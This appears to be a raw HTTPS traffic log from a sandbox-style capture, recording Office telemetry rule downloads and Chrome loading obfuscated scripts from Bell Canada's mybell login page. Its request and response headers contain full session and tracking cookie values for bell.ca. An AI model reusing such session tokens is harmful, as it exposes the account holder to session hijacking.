                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:54 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 5fd3a61a-e01e-0071-0feb-2a08e7000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131154Z-15b8d89586fst84kttks1s2css00000003900000000062cw
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      25192.168.2.94973813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:54 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 404
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 1abafd92-601e-0070-072b-27a0c9000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131154Z-16849878b78q9m8bqvwuva4svc000000083000000000c13h
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      26192.168.2.94974013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:54 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 428
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: ef4969e5-401e-002a-2c3c-28c62e000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131154Z-15b8d89586f6nn8zqg1h5suba800000004tg000000008bwn
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      27192.168.2.949728206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC2506OUTGET /static/bell_common.js?cache HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a95 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC1728INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:54 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 10205
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=3600, immutable
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; Path=/; Max-Age=1577847600; Domain=bell.ca; Secure
                                                                                                                                                                                                                                                                                                                                      Bell-Geo: 1
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; path=/; domain=bell.ca; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab200073da83a4c93dabd8675d5f42a0a44681d1c0e897cc30de8b1b3594dd5c5abab3081a9b435211300005e7d1f603bc3df517cceef277ef738f68ba506d59bc5531e6c3729c845d2bb58651ae00478ad7709bcbe63f4b7ebe7b; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:54 UTC10205INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 28 66 75 6e 63 74 69 6f 6e 28 62 6b 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 4b 3d 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 6c 6c 2e 62 69 6e 64 28 46 75 6e 63 74 69 6f 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 29 3b 76 61 72 20 6f 3d 5b 5d 3b 76 61 72 20 78 3d 5b 5d 3b 76 61 72 20 6c 3d 7b 74 6f 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6f 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 74 68 69 73 29 3b 69 66 28 61 3e 3d 30 29 7b 72 65 74 75 72 6e 20 78 5b 61 5d 7d 72 65 74 75 72 6e 20 4b 28 74 68 69 73 29 7d 7d 3b 6c 2e 74 6f 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 3d 76 6f 69 64 20 30 3b 6f 3d 5b 6c 2e 74 6f 53 74 72 69 6e 67 5d 3b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function(){(function(bk){"use strict";var K=Function.prototype.call.bind(Function.prototype.toString);var o=[];var x=[];var l={toString:function(){var a=o.lastIndexOf(this);if(a>=0){return x[a]}return K(this)}};l.toString.prototype=void 0;o=[l.toString];


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      28192.168.2.949741206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC2506OUTGET /static/bell_common.js?async HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a95 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC1760INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 988
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; Path=/; Max-Age=1577847600; Domain=bell.ca; Secure
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Bell-Geo: 1
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; path=/; domain=bell.ca; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000ab5afd0a4d948543224ab33867a4eaf344c93f2cff07e90b762fd0a29db72e42087a8b7735113000899cc6f965d8cafaee122bc2f1598953a857ecf7349bd26d67667d8c11f87e19abfac47d2e2055f31d93db59e04640af; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC988INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 64 3d 64 6f 63 75 6d 65 6e 74 2c 77 3d 77 69 6e 64 6f 77 2c 75 3d 22 2f 73 74 61 74 69 63 2f 62 65 6c 6c 5f 63 6f 6d 6d 6f 6e 2e 6a 73 3f 73 65 65 64 3d 41 49 42 51 71 65 4b 53 41 51 41 41 31 74 58 35 38 61 75 42 38 74 4b 31 70 6f 47 35 76 37 53 66 37 46 51 7a 35 63 4d 76 67 64 49 70 46 39 63 6c 44 57 6a 54 75 51 78 5f 59 6a 79 41 26 6c 6d 53 65 4c 38 71 41 72 77 2d 2d 7a 3d 71 22 2c 76 3d 22 66 78 64 77 4d 47 67 52 74 22 2c 69 3d 22 65 63 34 36 63 32 66 35 39 38 63 33 39 32 63 66 64 33 64 36 31 34 62 61 37 32 36 31 33 32 37 33 22 3b 76 61 72 20 73 3d 64 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 76 2c 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 65 2e 73
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function(a){var d=document,w=window,u="/static/bell_common.js?seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q",v="fxdwMGgRt",i="ec46c2f598c392cfd3d614ba72613273";var s=d.currentScript;addEventListener(v,function f(e){e.s


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      29192.168.2.949742206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC2527OUTGET /ruxitagentjs_ICA7NQVfghqrux_10299241001084140.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a95 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:55 UTC2356INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 31 Oct 2025 13:11:55 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 03 Mar 2010 07:01:40 GMT
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
